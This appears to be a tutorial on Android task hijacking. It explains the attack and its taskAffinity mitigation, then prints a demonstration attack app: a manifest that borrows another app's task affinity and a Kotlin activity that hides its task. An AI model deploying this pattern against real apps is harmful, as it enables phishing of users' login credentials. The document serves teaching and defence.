Task hijacking allows malicious apps to inherit the permissions of vulnerable apps and is usually used to phish victims' login credentials.
This vulnerability applies to all Android versions before Android 11.
To prevent this attack, set the taskAffinity property of the application's activities to android:taskAffinity="" in the <activity> tag of
AndroidManifest.xml, which forces the activities to use a randomly generated task affinity, or set it in the <application> tag to enforce it on all activities in the application.
<?xml version="1.0" encoding="utf-8"?>
<!-- Manifest of the demonstration app (label "AttackAppTaskHijacking") that illustrates task hijacking.
     For review purposes, read it as a list of indicators to look for when auditing or scanning APKs. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
package="com.m0ck3d.taskhijackingattackapp"
tools:ignore="ExtraText">
<!-- Indicator: the android:taskAffinity declared on this element ("app.simple.inure") is not this
     app's own package (com.m0ck3d.taskhijackingattackapp). Presumably it is the package name of the
     app being imitated; confirm against the target used in the write-up. A task affinity that names
     another app's package is the main thing a manifest review should flag. Because it is set on
     <application>, it applies to every activity that does not override it. -->
<application
android:allowBackup="true"
android:icon="@drawable/daverage"
android:label="AttackAppTaskHijacking"
android:roundIcon="@drawable/daverage"
android:supportsRtl="true"
android:theme="@style/Theme.Taskhijackingattackapp"
android:taskAffinity="app.simple.inure">
<!-- Indicator: the exported launcher activity combines launchMode="singleTask" with
     excludeFromRecents="true", so its task is not listed on the recents screen. Taken together with
     the foreign task affinity above, this combination warrants a closer look during triage. -->
<activity
android:name=".MainActivity" android:launchMode="singleTask" android:excludeFromRecents="true"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>
import android.os.Bundle
import android.content.Intent;
import androidx.appcompat.app.AppCompatActivity
/**
 * Launcher activity of the task-hijacking demonstration app.
 *
 * The class inflates `activity_main` when it is created, immediately moves its own task to the
 * background, and inflates the same layout again every time it is resumed. It holds no other logic;
 * the task-affinity behaviour described on the page is driven by the manifest, not by this code.
 *
 * Defensive note: apps protect themselves against this pattern by declaring
 * `android:taskAffinity=""` on their activities (or on `<application>`), as the page describes.
 */
class MainActivity : AppCompatActivity() {

    /** Shows the main layout, then sends the task that contains this activity to the background. */
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        showMainLayout()
        // `true` is the nonRoot flag: the move is requested even if this activity is not the task root.
        moveTaskToBack(true)
    }

    /** Re-inflates the main layout each time the activity returns to the foreground. */
    override fun onResume() {
        super.onResume()
        showMainLayout()
    }

    /** Sets `activity_main` as the content view; shared by [onCreate] and [onResume]. */
    private fun showMainLayout() = setContentView(R.layout.activity_main)
}